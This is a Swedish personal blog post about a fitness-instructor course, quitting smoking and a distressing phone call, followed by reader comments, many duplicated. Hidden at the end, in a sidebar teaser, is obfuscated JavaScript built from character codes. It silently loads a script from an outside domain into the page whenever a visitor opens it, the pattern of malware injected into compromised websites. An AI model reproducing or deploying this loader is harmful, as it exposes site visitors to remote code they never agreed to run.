UNDERBAR dag, underbara människor! Rökabstinens deluxe! Mindre psykbryt!

image

God kväll! ÄNTLIGEN hemma! Jag körde vilse i skogen och hittade inte hem… Hmm. Mer om det längre ner!

Alltså vilken underbar dag på Safeeducation!!! Denna utbildning är GRYM på ALLA plan!

 Förmiddagen spenderade vi med Marcus, praktisk träning, teknik i olika övningar… samt lite ”rollspel” där vi övar på att instruera varandra precis som vi kommer göra md framtida klienter =) Eftermiddagen ägnande vi oss åt kost. Det är ett ämne man behöver djupdyka i.  Det var underbara Jill Holmström som höll i den undervisningen.

-WOW vilken kvinna!

Jag har träffat henne tidigare genom Hälsokicken och fastnade direkt för henne! Nu på fredag lanserar hon sin nya sida och den 4:e oktober kommer hon ha en föreläsning här uppe i Stockholm. Jag ska absolut dela med mig av info och länk där ni kan boka om ni vill ta del av denna. När sidan är lanserad. Jag och Annelie ska gå på den! Längtar!!!!!

Här får du några kloka ord direkt ifrån denna inspirerande kvinna:

-Gör det enkelt dig och skippa stressen kopplat till mat och träning genom att följa @levstarkare !!  INGEN diet, INGET bullshit utan en jävla massa hållbara lösningar och massor av glädje. Vardagsglädje underlättar både viktminskning och muskeltillväxt. Så det så! Välkommen till @levstarkare <3

Gör som jag och följ henne på instagram  HÄR

image image Härliga klasskamraterna Julia & Lotta 🙂 Så roliga och härliga tjejer! -Girlpower! 

image image image Lunch date på skolgården med Armin & Rasmus 🙂

image image image

hahaha! En crazy bild där jag hotar att bita Armin! Stundvis under skoltiden blir man sådär härligt barnslig som man bara får vara i skolan 😉 

image

Efter första omgången av lektionen med Jill så rusade jag och några klasskamrater till affären för att köpa frukt! Fokus ligger på att äta mååååånga olika färger 😉

Jag ska förklara mer i ett senare inlägg. Det snurrar i hjärnan av all information! Men guuuuuud så inspirerande! OCH skrämmande! Jag har mycket att lära! VARJE dag i skolan får jag en ”aha” upplevelse och en kraftig dos med självinsikt! Jag ska göra om och göra rätt 😉 det är det som är så fascinerande att man aldrig kan bli fullärd, just nu är hungrigare än någonsin på att fortsätta min utveckling mot mitt ”nya” liv!!! Jag vet vad jag vill, jag SKA ta mig dit! Jag kommer lägga all min energi på att uppnå mina mål. Jag kommer att ta hjälp av kompetenta, genuina och inspirerande människor som jag på löpande band har omkring mig just nu….

Det finns en mening med allt. Jag är fortfarande trött och trasig på insidan. Jag har en ”ärr vävnad” att jobba med. Men jag VET att jag kommer att klara det! Som Gunde Svan brukar säga ”ingenting är omöjligt” 

image image image

Efter skolan ringde Tanja, som jag mötte upp en snabbis för en kaffe dejt på Medis, MYSIGT! <3 

image

Humöret var på topp. Energin likaså. Vi slutade skolan 17:00 Jag stannade kvar tillsammans med en klasskamrat och körde rörlighetsöningar och bålstabilitet då jag är vig som ett kylskåp och svag i bålen!

Jag skulle egentligen åkt raka vägen hem, pluggat, jobbat, bloggat osv… Men den där stunden med Tanja var mysig och rörlighets träningen superviktig!  

MEN på vägen hem får jag ett samtal. Ett miner roligt samtal. Detta ÄR en ärlig blogg, här går det upp och ner ism i en bergodalbana!

Personen ifråga var full, otrevlig och slängde på luren. Trodde ”hen” Det var bara det att ”hen” aldrig la på luren… så i 25 min satt jag och lyssnade på  ”hen” som full och dum pratade om mig! Grrrrr! Det kokade inombords! Min egen ”hen” som jag älskar av hela mitt hjärta! ( OBS eventuella journalister INGEN dejt/pojkvän!) 

 Jag blev så ledsen, irriterad, arg och besviken på samma gång! Jag smsade personen ”jag är kvar i luren, bara så att DU vet” . Strax därefter la ”hen” på! Jag har haft en toppen dag heja dagen, men min rökabstinens har varit en STOR utmaning idag.2paket tuggummi, och en massa knep för att distrahera mig säls!

Jag svängde in på en mack, köpte cigg och kaffe. Gasade ilsket därifrån, höjde volymen på stereon. Grät, skrek och sa allting som jag vill och velat säga till ”hen” Tills rösten tog slut.

Så nu är jag så hes att jag knappt kan prata. Jag insåg att jag missat en uppfart och hamnat mitt ute  i skogen utan mottagning så jag kunde slå igång gps. Nånstans utanför Uppsala.

Jag klev ur bilen för att röka. Men jag kunde inte. Jag stod där och grät, igen! Jag vill inte göra dessa människor som uppmuntrar mig till att INTE röka besvikna. Jag vill inte göra mig själv besviken… Tänk vad bra det kan vara att ha människor runt omkring en som faktisk tror på en. DET gjorde att jag faktiskt avstod! Så lätt ska jag inte falla dit! (TACK ni stöttepelare som omedvetet räddade mig från att falla dit) 

 Kanske överreagerar jag med mitt mindre psykbryt ensam i bilen,  pga av rök-abstinensen i kombination med besvikelsen. Men ibland behöver man bara få ur sig den där negativa energin! Bägaren rann över helt enkelt! 

Jag känner att ”hen” inte ska få förstöra min energi, min positiva anda och framförallt inte få mig att ta till ciggen som ett dumt tillfälligt ångestdämpande! Så det så!

 Ciggen ligger i papperskorgen! Jag älskar ”hen” därför gjorde det nog så ont som det gjorde. Alla kan vi göra misstag ibland, alla kan säga något dumt ibland. Men detta gjorde fasiken FÖR ont! Vi kommer reda ut det…. Men just nu så måste jag klippa med alla som blir energitjuvar. jag är fortfarande FÖR trasig för att låta minn energi gå åt till sådant.

Jag måste behålla fokus på det jag gör. På min son, på mig själv, min hälsa, utbildningen, jobb och kommande projekt.  

Som man brukar säga ”man kan inte hjälpa någon annan innan man hjälp sig själv” Alltså du vet.. syrgasmasken på flygplanet, hjälp dig själv innan du hjälper ditt barn… annars kanske båda faller ihop! <3

Efter många om och men (ca 1.5 timme senare) så kom jag tillslut hem.

Då ringde jag upp min väninna och kollega Annelie på inreda.com. Hon har fångat upp mig vid några andra tillfällen där jag haft ett tillfälligt bakslag. Det gjord hon ikväll också. Hon har varit på FORMEX mässan hela dagen. Det är första gången på 10 år som jag själv inte är där och gör inköp till My’s Blommor. Det känns konstigt och lite sorgligt….

Vi pratade om hennes inköp, hon har hittat en hel del nye leverantörer! SÅ kul!

Vi pratade om allt och ingenting. Vi bestämde oss båda för att gå på Jills föreläsning den 4:e oktober och ska göra det till en mysig tjejkväll. TACK Anneli för att du är DU! <3

Då hon även imorgon ska på FORMEX och fortsätta shoppa så vet jag att hon just nu har rea på massa roliga grejer på sin webbshop, det behöver ju göras plats för allt nytt som är påväg in. Du kan bla fynda Odd Molly Home, Tine K och mycket annat…. Har du inget bättre för dig, kika in HÄR och se vad som finns =)

IMG_9316

Nu ska jag repetera lite grejer från skolan… sen ska jag sova! Kram och gonatt <3

/ My Martens

43 Komentarer

 1. Hej My Hur kunde hen läsa ditt sms när hen inte hade lagt på luren
  Du skrev att efter sms så la hen på luren. Jag får inte ihop det ??

 2. Tycker synd om personen som ringde dig i berusat tillstånd hen måste må väldigt dåligt…hoppas att hen också har vänner som kan stötta .
  Duktig du är som inte rökte.

 3. När konflikter uppstår är det bästa ibland att ta ett steg tillbaka och avlägsna sig själv från hela situationen. Särskilt i sådana fall då motståndarna har förlorat sans och vett och använder allt som man säger, gör, har gjort och INTE sagt eller gjort, emot en.
  När jag slutade röka hade jag alltid en dosa portionssnus som jag tog till när suget blev mig övermäktigt. Inget bra råd kanske att byta ett beroende mot ett annat men det hjälpte mig iaf och jag blev ingen snusare heller.?
  Fokusera på dig själv My precis som du tänkt. Allt brukar lösa sig till slut. Kram

 4. Hej My Hur kunde hen läsa ditt sms när hen inte hade lagt på luren
  Du skrev att efter sms så la hen på luren. Jag får inte ihop det ??

 5. Fantastiskt att du stod emot röksuget, bra gjort! Det är nu du inser vilka som är dina riktiga vänner!
  Ha en bra dag och ta hand om dig!

 6. Tycker synd om personen som ringde dig i berusat tillstånd hen måste må väldigt dåligt…hoppas att hen också har vänner som kan stötta .
  Duktig du är som inte rökte.

 7. Vet hur jobbigt det är när röksuget slår till!! Hoppas det ordnar sig med hen…finns inget som gnager så som ouppklarade relationer. Kram!

 8. Du blir bara snyggare och snyggare och smalare för varje dag. Ej 5:2 bantad utan för att du tränar och äter rätt, bra jobbat.
  Det där telefonsamtalet, att du fick skit är bara ren och skär avundsjuka. My, folk klarar inte av en snygg tjej som du och som gör något vettigt av sitt liv än lever på karlar som har stålar, det blir för mycket helt enkelt.
  Du passar väldigt bra när du har håret så där uppsatt.
  Varför låter du dessa energitjuvar ta din energi? Varför bli upprörd över en sådan person som ringer upp dig och snackar ännu mera skit om dig? Ett tips, avsluta relationen med dessa falska energitjuvar, du verkar ha mycket sundare kompisar på din utbildning, och ni verkar stå på samma nivå. Man mår bäst av att umgås med folk som står på samma nivå och som har samma mål och inriktning.
  Tummen upp!

 9. När konflikter uppstår är det bästa ibland att ta ett steg tillbaka och avlägsna sig själv från hela situationen. Särskilt i sådana fall då motståndarna har förlorat sans och vett och använder allt som man säger, gör, har gjort och INTE sagt eller gjort, emot en.

  När jag slutade röka hade jag alltid en dosa portionssnus som jag tog till när suget blev mig övermäktigt. Inget bra råd kanske att byta ett beroende mot ett annat men det hjälpte mig iaf och jag blev ingen snusare heller.😀

  Fokusera på dig själv My precis som du tänkt. Allt brukar lösa sig till slut. Kram

 10. Ibland känns det som att du är alldeles för snäll och tänker att du vill och kan reda ut allt. Ge alla hur många chanser som helst. Sådan var jag också men nånstans så fick jag nog. Det finns gränser. En behöver inte stänga ute alla som tar för mycket energi ur sitt liv men kanske hålla relationer lite på sparlåga under perioder.

 11. Fantastiskt att du stod emot röksuget, bra gjort! Det är nu du inser vilka som är dina riktiga vänner!
  Ha en bra dag och ta hand om dig!

 12. Vet hur jobbigt det är när röksuget slår till!! Hoppas det ordnar sig med hen…finns inget som gnager så som ouppklarade relationer. Kram!

 13. Du blir bara snyggare och snyggare och smalare för varje dag. Ej 5:2 bantad utan för att du tränar och äter rätt, bra jobbat.
  Det där telefonsamtalet, att du fick skit är bara ren och skär avundsjuka. My, folk klarar inte av en snygg tjej som du och som gör något vettigt av sitt liv än lever på karlar som har stålar, det blir för mycket helt enkelt.

  Du passar väldigt bra när du har håret så där uppsatt.

  Varför låter du dessa energitjuvar ta din energi? Varför bli upprörd över en sådan person som ringer upp dig och snackar ännu mera skit om dig? Ett tips, avsluta relationen med dessa falska energitjuvar, du verkar ha mycket sundare kompisar på din utbildning, och ni verkar stå på samma nivå. Man mår bäst av att umgås med folk som står på samma nivå och som har samma mål och inriktning.

  Tummen upp!

 14. Vad otroligt hemskt att behöva höra någon snackar så mycket skit om en. Vad sårande och knäckande. Jag vet inte ens om jag hoppas på att ni reder ut det, för såna människor kan inte älska en om man nu kan säga så mycket hemskt. Nu vet jag inte till vilken grad det var, det vet bara du och därför vet bara du om det är värt eller inte. Alla kan göra misstag och kan förlåtas men då ska personen verkligen visa det och kämpa för din vänskap eller den relation ni nu har.
  Stor kram fina du, du är värd allt det bästa i livet My, det ska du veta!

 15. Jag förstår att det måste vara inspirerande med din nya utbildning. Lova att dela med dej av lite kost och träningstips här på bloggen. Bra att du kunde stå emot röksuget, 1-0 till dig.

 16. Vad starkt utav dig att inte ta det där blosset efter det samtalet du fick ! Tänk på denna situationen när nästa starka röksug kommer. Du fixar det !

 17. Vi är nog många som vill sluta röka men som inte riktigt får tummen ur som du lyckats med. Jag vill ha en cigg i mina olika sinnesstämningar, när något roligt händer, när något tråkigt inträffar, när jag vill koppla av osv osv.. Just det där du beskrev, hur du ville ta till ciggen när din ”väninna” gjorde bort sig och du AVSTOD! Helt jävla grymt gjort. Skriv gärna mer om dina med och motgångar ang rökandet. Vi är nog många som kan få ut mycket av att följa en annan/dig. Ja, det kan leda till ett rökstopp för fler av oss. Heja dig My! ?

 18. Ibland känns det som att du är alldeles för snäll och tänker att du vill och kan reda ut allt. Ge alla hur många chanser som helst. Sådan var jag också men nånstans så fick jag nog. Det finns gränser. En behöver inte stänga ute alla som tar för mycket energi ur sitt liv men kanske hålla relationer lite på sparlåga under perioder.

 19. Vad otroligt hemskt att behöva höra någon snackar så mycket skit om en. Vad sårande och knäckande. Jag vet inte ens om jag hoppas på att ni reder ut det, för såna människor kan inte älska en om man nu kan säga så mycket hemskt. Nu vet jag inte till vilken grad det var, det vet bara du och därför vet bara du om det är värt eller inte. Alla kan göra misstag och kan förlåtas men då ska personen verkligen visa det och kämpa för din vänskap eller den relation ni nu har.

  Stor kram fina du, du är värd allt det bästa i livet My, det ska du veta!

 20. Jag förstår att det måste vara inspirerande med din nya utbildning. Lova att dela med dej av lite kost och träningstips här på bloggen. Bra att du kunde stå emot röksuget, 1-0 till dig.

 21. Vad starkt utav dig att inte ta det där blosset efter det samtalet du fick ! Tänk på denna situationen när nästa starka röksug kommer. Du fixar det !

 22. Vi är nog många som vill sluta röka men som inte riktigt får tummen ur som du lyckats med. Jag vill ha en cigg i mina olika sinnesstämningar, när något roligt händer, när något tråkigt inträffar, när jag vill koppla av osv osv.. Just det där du beskrev, hur du ville ta till ciggen när din ”väninna” gjorde bort sig och du AVSTOD! Helt jävla grymt gjort. Skriv gärna mer om dina med och motgångar ang rökandet. Vi är nog många som kan få ut mycket av att följa en annan/dig. Ja, det kan leda till ett rökstopp för fler av oss. Heja dig My! 🌸

 23. Vad otroligt jobbigt för dig att få höra detta från någon som du tycker om. Det fick mig att tänka på att du själv ringde på fyllan till någon och skällde på hen. Du bad om förlåtelse o det hoppas jag att din familjemedlem som ringde till dig också gör.

 24. Vad otroligt jobbigt för dig att få höra detta från någon som du tycker om. Det fick mig att tänka på att du själv ringde på fyllan till någon och skällde på hen. Du bad om förlåtelse o det hoppas jag att din familjemedlem som ringde till dig också gör.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/